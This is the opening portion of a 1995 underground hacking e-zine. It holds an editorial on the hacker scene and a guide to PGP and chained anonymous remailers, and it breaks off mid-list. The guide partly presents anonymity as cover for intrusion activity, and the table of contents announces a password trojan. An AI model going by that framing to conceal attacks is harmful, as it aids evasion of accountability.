ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜ Û ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ Û Û ÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ßÜ Üß ÜÜÜÜÜÜÜÜ Û Û Û Û Û ßÜß Û Û Û ßÜß Û Û Û Û Û Û Û ß Û Û Û ß Û Û Û Û ÛÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÛ Û Û Û Û Û Û Û ÛÜÜÜÜÜÜÜÜÜ Û Û ÜÜÜÜÜÜ Û Û ÛÛ Û Û Û Û Û Û Û ßÜ Û Û Û Û Û Û Û Û Û ßßßßßßß Û Û Û Û Û Û Û Û ßßßßßßßßßßßßßß Û Ü Û ÛÛÜÛÛ Û Û Û Û Û ÜÛ Û Û ß Û Û Û Û Û Û ÜßÛ Û Û Û Û Û Û Û ßßßßßßßßßßßßßßßßßßßßßßßßßßß Üß Û ßßßßßßßßßß Û ßßßßßßßßßß Û ßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ßßßßßßßßßßßß ßßßßßßßßßßßß Taking Your Machine Presents -+-+-====================================================================-+-+- ________ ________ __ __ ______ |__ __|__ __| \/ | | | | | | | | ----| | | __| |__| |\/| | ----| |__| |________|__| |__|______| ______ _____ _____ | ___|| || | | __| | | || | | | | | | || \ |__| |_____||__|___| _____ ______ __ __ _____ _ __ ______ ______ | | | || | | || || \| || ___|| | | | | | ____|| |-| || | || || |___ | ---| | | | || |-| || || || |__ || ---| |__|__| |______||__| |__||__|__||__|\__||______||______| -+-+-====================================================================-+-+- Time For A Change Volume 1 - Issue 2 March 22, 1995 -+-+-====================================================================-+-+- INTRODUCTION ____________ Well, Here is issue 2. A bit fatter, and hopefully a bit better than issue 1 was. We have a bit of a variety this month. I wrote a file which will hopefully educate more people on the why's and how's of encryption where it relates to mail. Major shares information on pagers, and hacking pager service. Panther Modern takes a deeper look into nslookup, with an excellent followup article to the How To Find Domains article from issue 1. Terminal presents a new trojan and ideas on how to install/use it. A System ID file with defaults listed is also included. Compiled by various members of TYM. This list will be constantly updated and released on it's own so please feel free to send items to be added. systems, defaults, etc.. Submissions for this magazine are accepted from anyone who has the desire to write an interesting article, and also has the ability to do so. We are actively seeking out quality writers, so don't be shy. Send your submissions, comments, suggestions, etc... to: gitm@alpha.c2.org or on mine or Voyagers boards. Ghost in the Machine @ The FreeMatrix ]I[ (303) 914-0031 Hackers Haven BBS (303) 343-4053 All Contents in this magazine are Copyright (C) 1995 FreeMatrix Enterprises. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TABLE OF CONTENTS: INTRODUCTION...............................................Ghost in the Machine Editorial: The State of the "Scene" as I see it............Ghost in the Machine 1. Encryption. Why you should use it, and How. Pt. 1: Mail.Ghost in the Machine 2. pagers...PAGERS...pAgErS...PaGeRs...PagerS..............Major 3. passwd trojan...........................................Terminal 4. nslookup: The Utility From The Gods.....................Panther Modern 5. A Definitive Guide to System ID and Defaults............TYM Crew =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Editorial: The State of the "Scene" as I see it. Correct me if I am wrong, but those of you who have been around for a while may have noticed (and correctly at that) that the h/p scene in general is degenerating. It has been a few years since I have seen a collective of people sharing and helping each other out as a whole. I now see a bunch of tired old has-been's taunting the never-will-be's, people who "might-have-been" being totally turned off by the way they were treated upon entering the "scene". The time is NOW to stop this moronic bullshit from all sides and get with the program. The "Computer Underground" community could be a powerful force to whatever ends, if it weren't continuously ripping itself into pieces. All it takes is a little paying attention, a little more tolerance, and a little more common decency. Here are my suggestions to this end: To those of you who have the knowledge, but are lacking in the social skills dept: Be nice to a lamer. You may not know what good could come of it. I do. I have always been quite helpful to people new to the scene, and it has rewarded me in learning new things from them. And most of the helping I've done isn't anything that required a great devotion of time. Usually a pointer to a book, or tfile is enough, and the people that are worth the while will take it from there. To those of you who are new: Lurk! That is the single biggest problem that people new to the scene do. They start running off at the mouth, and anyone who may have been of help to them turns on the auto-idiot-filters and tunes them out. Listen to what people say, watch what they are doing, read, read, read. Most of all, ask questions only when you have exhausted your own sources of information. In other words learn what you can on your own, don't beg other people for easily obtained information. Hunt it down yourself and you might get an even better deal that you had hoped for. Pester people and you will probably be flamed into non-existence. Most of all, I think some people need a brief refresher on what hacking is all about. It is not about getting root, destroying information, crashing BBS's, getting the latest unix exploit, posing on IRC, or espionage. Though I suppose it could be used for these ends. It is about: LEARNING, EXPLORING, and LIBERATING. As the title of this magazine suggests, it *IS* Time For a Change. It is time to get back to the basics and remember what this is all about. It is time to join together as brothers instead of breaking up into small non-communicating parts. It is time to go and search for new things, time to quit becoming fully like the totalitarian institutions that we supposedly despise. It is time to throw a big fuck you at our deaf and blind government. It is time to move forward instead of stagnating. It is time to evolve. It is TIME FOR A CHANGE. Peace. gitm@alpha.c2.org ------------------------------------------------------------------------------- Time for a Change presents Encryption, Why you should use it, and How. Part I - Mail by Ghost in the Machine ------------------------------------------------------------------------------ INTRODUCTION - This file is aimed at the the crypto-novices from all walks of life. Whether it be the wiley sysadmin wanting to protect crucial system information, the ueberhacker wanting to keep his activities secret, or joe blow from anyplace USA that wants to make sure his private life remains private. The main reason that I am writing this file is that many people I communicate with refuse to use encryption, or do use it, but very grudgingly. I want all of my communications to be secure, and so should you. This file will make an attempt to explain why YOU need encryption, and some means of obtaining and using it. Why should I use encryption? Let me just say that the world is an insecure place, and the net is even more so. Everything you do or say can be logged, recorded, and/or in some way monitored. I am not going to try to tell you how to gain personal privacy in the real world (perhaps the next file.), but how to gain at least an acceptable level of privacy electronically. Let's start with an example that most people can relate to: Email. You have an account on netcom.com, you want to send mail to someone at nyx.cs.du.edu. Sounds pretty simple eh? Well, the following is a log from traceroute on just exactly where your packets are going. 1 netcomgw.netcom.net (192.100.81.254) 2 ms 12 ms 3 ms 2 t3-1.scl-gw1.netcom.net (163.179.101.2) 3 ms 2 ms 2 ms 3 t3-1.chi-gw1-2.netcom.net (163.179.102.1) 49 ms 47 ms 47 ms 4 t3-1.dc-gw4-2.netcom.net (163.179.103.1) 60 ms 64 ms 60 ms 5 t3-1.mae-east.netcom.net (163.179.157.2) 61 ms 60 ms 60 ms 6 sl-mae-e-F0/0.icp.net (192.41.177.241) 84 ms 63 ms 60 ms 7 sl-dc-8-H1/0-T3.sprintlink.net (144.228.10.41) 61 ms 61 ms 61 ms 8 sl-fw-5-H4/0-T3.sprintlink.net (144.228.10.18) 99 ms 96 ms 93 ms 9 sl-fw-4-F0/0.sprintlink.net (144.228.30.4) 95 ms 95 ms 95 ms 10 sl-uccs-1-S0-T1.sprintlink.net (144.228.34.82) 124 ms 120 ms 122 ms 11 ACI-UCCS.co.westnet.net (198.59.67.29) 126 ms 122 ms 143 ms 12 CCC-ACI.co.westnet.net (198.59.9.81) 157 ms 206 ms 160 ms 13 UCBCGS-CCC.co.westnet.net (198.59.9.5) 188 ms 137 ms 171 ms 14 * DEN-UCBCGS.co.westnet.net (204.131.55.65) 146 ms 163 ms 15 DU-DEN.co.westnet.net (204.131.55.14) 146 ms 176 ms 162 ms 16 du-up0.cair.du.edu (130.253.253.253) 991 ms * 137 ms 17 du-up1.fddi.du.edu (130.253.251.253) 487 ms 145 ms 178 ms 18 nyx.cs.du.edu (130.253.192.68) 150 ms 176 ms * That is 18 stops on the way to it's destination. Any of which could/can intercept your mail. Nevermind the destination, where it will sit for an indefinite period of time. Let me make one thing very clear. System Administrators and Hackers, and perhaps other people CAN and DO read private mail on the systems where they have the ability to do so. There are lots of reasons for this. Sysadmins sometimes do it to search for signs of system intrusion, for other "legitimate" reasons, or simply because they are bored, nosey and can. Hackers also do it for many reasons, to look for possible holes/passwords/etc to exploit, to get information about a certain person, to make sure the sysadmin is not on to them, and also because they are bored, nosey, and can. The next obvious step for some people (apparently a LOT of people) is to take a small step in securing anonymity. Using an anonymous remailer. A very popular remailer is located at anon.penet.fi. The way it works is you send mail to it, it sends you back an id in the format of anXXXXXX where XXXXXXX is a 6 digit number based somehow on your host/user-name. Each person gets a unique ID and is able to send mail "anonymously" by addressing the message to anon@anon.penet.fi and putting X-Anon-To: guy@foo.bar in either the header or body of the message. It also has password capabilities which are required to use the anon account to post to usenet newsgroups. This seems to be secure enough for some people, but in reality, it's no more secure than sending mail directly. The only difference is, on the last leg of the trip it no longer contains your email address. One problem stems from the fact that penet ALWAYS has you address, and in order to compromise ANY "anon" communications through there, you only need to capture one system. Also, there is the matter of before and after. If you send sensitive material (I'll leave it to you to define sensitive) via email, you have your account, and someone elses attached to it. Anon remailing takes only one of those factors out. Depending on which side of penet your mail happens to be on, that may not even be the case. On it's way to penet, and until it is processed (chewed up and spat out a lot of the time) the mail contains your address, the recipients address, AND your anon password in plaintext. Some user end mail programs save sent mail automatically, thereby totally defeating the purpose of sending anon mail. Even if you mail program doesn't save your mail, and you are extra careful about it, take a look at where it goes before it hits penet. 1 * netcomgw.netcom.net (192.100.81.254) 56 ms 66 ms 2 t3-1.scl-gw1.netcom.net (163.179.101.2) 7 ms 2 ms 2 ms 3 149.20.64.1 (149.20.64.1) 4 ms 3 ms 3 ms 4 San-Jose3.CA.ALTER.NET (137.39.29.1) 23 ms 7 ms 7 ms 5 Vienna1.VA.ALTER.NET (137.39.12.1) 242 ms 187 ms 245 ms 6 * Vienna3.VA.ALTER.NET (137.39.11.4) 70 ms 70 ms 7 Amsterdam2.NL.EU.net (134.222.5.1) 174 ms 199 ms 176 ms 8 Espoo-Tapiola1.fi.eu.net (134.222.27.2) 216 ms 213 ms 212 ms 9 Helsinki-Keskusta1.FI.EU.net (193.66.32.30) 218 ms 224 ms * 10 Helsinki-Keskusta3.FI.EU.net (193.64.138.252) 220 ms 217 ms 221 ms 11 router.penet.fi (193.64.202.254) 272 ms !H 229 ms !H 276 ms !H 11 Systems besides your own and anon.penet itself are having your mail passed through. That's not to mention any local machines your system might route it's mail through. All of those systems are seeing the "before" aspect of your "anonymous" mail. Any one of them could intercept it. You may ask: Why would anyone want to intercept my mail? That's not really the point, if someone is intercepting mail on a gateway, and happens to get yours, they might read it. Even a minuscule chance of mail interception is far too great a chance in my mind. If that is not enough, there have been dozens of rumors of penet being compromised, which makes it just a long out-of-the way semi-conspicuous trip to the same place. (Note: Since the original draft of this document, Julf's remailer at penet was raided by finnish police (as well as his home) and he was forced to give up some information regarding a person who used the remailer for "illegal" purposes. Penet is through, use it only as a fond memory of an early remailer. You are completely relieving yourself of privacy if you use this remailer.) Consider, however, an encrypted mail message. It cannot be read locally, because it is encrypted, it cannot be read by any possible interceptors for the same reason. If you use encryption AND a double blind anon service like penet, you are moving in the right direction. An even better move would be to use encryption, cypherpunk remailers (which will be covered later in this text) and throw penet or a similar service somewhere in the middle of the whole mess. Then you have as close to secure communication as you can get on a gigantic global network. There are still ways that these messages can be intercepted, followed, traced, and so forth, but these methods are quite difficult to accomplish, and are well beyond the scope of this document. METHODS - -PGP- The first thing you will want to do is pick up a copy of PGP 2.6 or higher. Due to legal reasons, PGP is no longer compatible with versions lower than 2.5. You can still read messages from people using 2.3- but they cannot read yours. If you are currently using a version less than or equal to 2.3a, upgrade. You aren't doing anything but inconveniencing yourself. If you are having trouble finding pgp, ftp to: ftp.csua.berkeley.edu directory: /pub/cypherpunks This site is the cypherpunks main ftp site. In addition to pgp, you will find a great assortment of other interesting crypto related documents, papers, programs, source code, etc.. It's a great site, check it out. Once you get (and install, compile or whatever you need to do with it on your machine) pgp, read the documentation thoroughly. Generate your own private key, and make an ascii public key extraction. Play with it until you get a decent feel for how the public key cryptosystem works. -REMAILERS- (Including chaining faq - With my mods to make it readable) ----------------------------BEGIN INSERTED FILE-------------------------------- CHAINING REMAILERS HELP Note-1: [RRT- stands for Request-Remailing-To:, most remailers also accept Anon-To: ] Note-2: [You is in this doc me@mysite.home, substitute that address for your own if you want to receive the test message yourself] Note-3: Anon-To: me@mysite.home MUST be written exactly as shown! 1 2 3 3 is a Space 2 is a Capital Letter 1 is a Capital Letter Note-4: All lines beginning with > are not intended to be typed/sent that way, they are just to mark what the messages should contain. __________________________________________________________________________ First you should test only one remailer: you > remailer 1 >> RRT- you __________________________________________________________________________ This is what you send: --> > From: me@mysite.home > To: hal@alumni.caltech.edu > > :: > Request-Remailing-To: me@mysite.home > > Test of remailer at alumni.caltech.edu __________________________________________________________________________ This is what you receive from alumni.caltech.edu: --> > From: nobody@alumni.caltech.edu > To: me@mysite.home > > Test of remailer at alumni.caltech.edu __________________________________________________________________________ If this is successful you add another remailer: you > remailer 1 >> RRT- remailer 2 >>> RRT- you This is what you send: --> > From: me@mysite.home > To: hal@alumni.caltech.edu > > :: > Request-Remailing-To: usura@xs4all.nl > > :: > Request-Remailing-To: me@mysite.home > > Test of remailer at alumni.caltech.edu and RRT xs4all.nl __________________________________________________________________________ Remailer usura@xs4all.nl will receive this message from hal@alumni.caltech.edu --> > From: nobody@alumni.caltech.edu > To: usura@xs4all.nl > > :: > Request-Remailing-To: me@mysite.home > > Test of remailer at alumni.caltech.edu and RRT xs4all.nl __________________________________________________________________________ Because the message has the header pasting tokens [::] the remailer at xs4all.nl knows where to send it to. You will receive this message from xs4all.nl --> > From: nobody@vox.xs4all.nl > To: me@mysite.org > > Test of remailer at alumni.caltech.edu and RRT xs4all.nl __________________________________________________________________________ You can keep adding remailers this way, every time you receive a test message back you add another remailer: if you stop receiving test messages, the last remailer added is most likely "down". You can check that by using that remailer directly. (ED Note: Some remailers that I have used take a VERY long time to remail. I have had even direct test messages take up to 12-24 hours. In other words, do not expect an immediate response from most remailers. A list of remailers and their presently clocked uptime will be included later in this file.) __________________________________________________________________________ The above is simple unencrypted remailing. If you want to have an encrypted chained remailing, you first have to "design" the chain. 0] from your PC send to alumni.caltech.edu 1] at alumni.caltech.edu RRT jpunix.com 2] at jpunix.com RRT vox.hacktic.nl 3] at vox.hacktic.nl RRT me@mysite.home {Stage 3:} This is actually the first message you make. --> > :: > Request-Remailing-To: me@mysite.home > > Test of PGP'ed remailing trough caltech, jpunix and vox. __________________________________________________________________________ The above is encrypted with the PGPpubKEY of vox.hacktic.nl and will result in this: > -----BEGIN PGP MESSAGE----- > Version: 2.6 for VoX Labz. > > hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe > 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+ > 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA > AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs > hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w== > =b0bT > -----END PGP MESSAGE----- __________________________________________________________________________ Then you than proceed to the 2nd stage the message which has to leave jpunix.com, so remail@vox.hacktic.nl knows what to do [decrypt it] is: --> > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- > Version: 2.6 for VoX Labz. > > hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe > 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+ > 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA > AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs > hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w== > =b0bT > -----END PGP MESSAGE----- __________________________________________________________________________ {Stage 2:} But jpunix.com has to know where to send it to, so the 2nd stage msg is: --> > :: > Request-Remailing-To: remail@vox.hacktic.nl > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- > Version: 2.6 for VoX Labz. > > hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe > 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+ > 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA > AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs > hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w== > =b0bT > -----END PGP MESSAGE----- __________________________________________________________________________ The above is then encrypted with the PGPpubKEY of jpunix.com __________________________________________________________________________ {Stage 1:} This new encrypted message gets the headers for caltech to remail: --> > :: > Request-Remailing-To: remail@jpunix.com > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- > > and the PGP encrypted message from {stage 2} > > -----END PGP MESSAGE----- __________________________________________________________________________ {Stage 0:} the message you send to alumni.caltech.edu is the encrypted message [with the PGPpubKEY of alumni.caltech.edu] of stage 1 plus a Encrypted: PGP header. --> > To: hal@alumni.caltech.edu > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- > > and the PGP encrypted message from {stage 1} > > -----END PGP MESSAGE----- __________________________________________________________________________ This you send from your PC to hal@alumni.caltech.edu : -> > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- [with alumni.caltech.edu's PUBkey] > Version: 2.6.1 > :: > Request-Remailing-To: remail@jpunix.com > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- [with jpunix.com's PUBkey] > Version: 2.6.1 > :: > Request-Remailing-To: remail@vox.hacktic.nl > > :: > Encrypted: PGP > > -----BEGIN PGP MESSAGE----- [with vox.hacktic.nl's PUBkey] > Version: 2.6.1 > :: > Request-Remailing-To: me@mysite.home > > Hi mom I'm home. > --------------------------------- > -----END PGP MESSAGE----- > -----END PGP MESSAGE----- > -----END PGP MESSAGE----- the inner envelope: you close this first | | | -> the second envelope: you close this second | -> the outer envelope: this one you close last -- If you finger remailer.help.all@chaos.bsu.edu you will receive a list of active remailers and their peculiarities. If you finger remailer-list@chaos.bsu.edu and/or remailer-list@kiwi.cs.berkeley.edu you will receive a list of uptime statistics. ________________________END INSERTED FILE______________________________________ This might seem kind of confusing to some at first glance, especially once you start testing with encryption. But the easiest way to remember is that it is a reverse enveloping system. the last remailer on your chain is the one with the real destination enclosed, and therefore is the first one to encrypt. From there it is elementary. -- TYPES There are several kinds of remailers. Some give you a mailing address pseudonym and no other protection. Others give you a mailing address and will encrypt all incoming mail for you based on a password that you supply. Still more (the majority) provide their public key and offer to decrypt and forward mail encrypted to it. I will attempt to cover a few of these types, and how you can go about using them. -- ALIASING REMAILERS The first type I will cover is the anon service at anon.penet.fi. It seems to be the most popular, and is also in the process of having some legal difficulties at the moment. Please read alt.privacy.anon-server if you would like to contribute help to their cause. anon@anon.penet.fi - Easiest for non-crypto types. All you need to do is send mail to ping@anon.penet.fi to receive a double blind address (note: double blind means that anyone who responds to you will be given an anonymous address and your mail will appear to come from it. Keep this in mind if you had thoughts of subscribing to high volume mailing lists through this service.). It will be mailed back to you automatically. It supports a password, nickname, and can be moved from mailing address to mailing address. It is a very good (if not comparably secure) remailer system. For a detailed help file on everything you could possibly want to know about it, send mail to help@anon.penet.fi. alpha.c2.org - Another aliasing service, but much more secure. When you use a service like penet, they actually have your mailing address. My mailing address at alpha.c2.org has no idea where to find me. It instead has what is called a reply block for my return address. A reply block is just like all the previous chaining information I went over, except all that the last part contains is where to send the actual message to. You can also include reply blocks in anonymous mail to people who you would like to get a response from. Just put the block and a few other small instructions (scripts.tar.gz on the cypherpunk ftp site contains scripts that can automate the more painful aspects of both this and several other chaining functions.). Here is an example reply block to a person (note: do NOT try to use this for remailers.. they will barf on all the excess ascii garbage). --------8<--cut here-->8-------- :: Encrypted: PGP -----BEGIN PGP MESSAGE----- Version: 2.6.2 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 =tQQE -----END PGP MESSAGE----- ). Another nice feature of this particular remailer is that all mail sent to your actual adress from there is also encrypted by alpha using standard pgp encryption using your chosen password as the key. I don't consider this to necessarily be a benefit where network monitoring is in effect, because I don't know where or how they store the account passwords, but since the mail you are receiving should be encrypted by the sender (hint, hint) it is an added bonus. Also it keeps nosy local sysadmins from scanning your mail for keywords or whatever. From this address (like many others) you can send/receive mail and post to usenet newsgroups. First, here is alpha's public key. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAi7K8rQAAAEEAMiK09Nd+NfaL4Q14bKT0Ivdj3MdbCjAG6Cs5ULYBS1ZWSLA KiHsm0+kPNHqBVOufN7FT2iK0Mbuyk+dZgHG6ScicDkImysRkmso7eh5c9mU9V8K M0+ImKJyOwgVLEgyRK5e4h2XHpwSTtpx3zZpk4CsexLGCQNXF+ikm236U0rNAAUR tCpQc2V1ZG9ueW1vdXMgUmVtYWlsZXIgPGFsaWFzQGFscGhhLmMyLm9yZz4= =xmQf -----END PGP PUBLIC KEY BLOCK----- Now, to create your new mail alias, pick a nick, and create the following message: From: yourname@alpha.c2.org New-Password: Your_Password Reply-Block: Now, encrypt to alpha with the -eta options on pgp, and send it off to alias@alpha.c2.org. It would probably be a good idea to chain it through one or more remailers on it's way. You should receive a response within an hour or so acknowledging your alias. For a comprehensive help file on this remailer, send mail to help@alpha.c2.org. chop.ucsd.edu - Nearly identical in most respects to anon.penet.fi. Send mail to acs-help@chop.ucsd.edu for an anonymous address assignment and a helpfile. mg5n+remailer@andrew.cmu.edu - This aliasing service is very similar to the service provided by alpha.c2.org. The main difference I note, is that the address is a bit more bulky. It is in the format of mg5n+alias!@andrew.cmu.edu. kinda long for my tastes, but they still provide an excellent service. send mail to mg5n+remailer-help@andrew.cmu.edu for a helpfile. -CYPHERPUNK REMAILERS- The next part of this file can be better summed up by 2 existing files. They cover all of the current remailers and their functions. The first one is a great helpfile containing the quirks and features of various remailers and their public keys. The second is a more structured listing with uptime statistics and other useful information. ---------------------------BEGIN INSERTED FILE #2------------------------------- MATT GHIO'S REMAILER LIST Finger remailer.help.all@chaos.taylored.edu or remailer.help.all@204.95.228.28 for the latest version of this file. Please report any inaccuracies in this information to Matthew Ghio Last Updated: January 24, 1995 The Cypherpunks' remailers allow you to send anonymous mail by adding the header Request-Remailing-To: and sending to one of the addresses listed below. Most (but not all) of these remailers also accept Anon-To: in place of Request-Remailing-To. These headers must be typed exactly as you see them; most remailers are case-sensitive. Mail without these headers is either rejected or delivered to the remailer administrators. If you can not add the required headers, place two colons (::) on the very first line of your message, then on the next line type Request-Remailing-To: and the address you want to send anonymously to. Skip a line, and then begin your message. Note that by using this method it is possible to send a message consecutively thru more than one remailer. Be sure to place the double colons on the first line of the message, and skip one line following the headers. Extra blank spaces (or forgetting to separate the headers and message) may cause problems. Also, keep in mind that many remailers only allow one recipient per message. The standard cypherpunks anonymous remailers are: hfinney@shell.portal.com hal@alumni.caltech.edu nowhere@bsu-cs.bsu.edu usura@xs4all.nl remail@c2.org remailer@ideath.goldenbear.com remailer@rebma.mn.org remail@vox.xs4all.nl remailer@desert.xs4all.nl remailer@nately.ucsd.edu remailer@xs4all.nl homer@rahul.net q@c2.org remailer@alpha.c2.org usura@replay.com remailer@myriad.pc.cc.cmu.edu syrinx@c2.org vanklava@eniac.ac.siue.edu remailer@tower.techwood.org You can add additional headers to your message by placing two number signs (##) at the beginning of the first line of the message body, and then add the special headers on subsequent lines. These headers are not interpreted by the remailer software, only passed thru to the output message. Some remailers require that you place the Subject: header in the body of the message, after the ## - The original subject line is removed. See the listings available by fingering remailer-list@kiwi.cs.berkeley.edu for specific format information for each remailer. remailer@soda.csua.berkeley.edu works slightly differently. It includes an encrypted reply block so that people can reply to your messages. It also requires that you use the header Anon-Send-To: to send anonymously, and features a usenet posting service. For more information on this remailer, finger remailer@soda.csua.berkeley.edu, or send mail to that address with the Subject: remailer-info remail@extropia.wimsey.com requires that you public-key encrypt your messages with PGP. This added security prevents a hacker or nosey sysadmin at your site from reading your outgoing mail or finding out where it's going. This remailer is not directly connected to the internet, so messages will be delayed about an hour. Some of the other remailers support PGP as well. For remailers which support both encryption and plaintext messages, identify encrypted messages by adding a header which reads: Encrypted: PGP, either in the actual message headers, or following a double colon (see examples below) PGP keys can be found at the end of this document. Some remailers offer several additional features. These include remailer@alpha.c2.org, remailer@xs4all.nl, remailer@nately.ucsd.edu usura@replay.com and remailer@myriad.pc.cc.cmu.edu Adding the header "Cutmarks:" will truncate the message starting with any line that begins with the same characters as in the Cutmarks header. This can be used to remove an automatically-inserted signature file. Also supported is the header "Latent-Time:". This allows a message to be delayed at the remailer and sent out at a later time. This is useful because it prevents people from correlating the times at which certain anonymous posts appear with the times that you are logged in. Both absolute and relative delays are possible. For example, "Latent-Time: 19:00" would have the remailer hold the message until 7 PM local time and then deliver it. Times must be in 24-hour format. "Latent-Time: +06:30" would deliver the message six hours and thirty minutes after it is received. The maximum permissible delay is 24 hours. These lines may be placed either in the message headers, or following the double colon. For more information, send mail to one of the remailers listed above, Subject: remailer-help There is an anonymous contact service at anon.penet.fi. Users are automatically assigned an address of the form anxxxxxx@anon.penet.fi, where xxxxxx is a number, when they first send a message via this remailer. Any replies to this address are forwarded back to you. For information on this remailer, send mail to: help@anon.penet.fi There is another anonymous contact service at chop.ucsd.edu. For information on this remailer, send mail to: acs-info@chop.ucsd.edu desert.xs4all.nl also has a anonymous account service. For more information, send mail to remail@desert.xs4all.nl with subject "help". There is a system installed on alpha.c2.org which will allow you to create an email address and have messages sent to that address encrypted and sent to you. For info on this remailer, send mail to help@alpha.c2.org. A help file on another remailer of this type is available by sending mail to 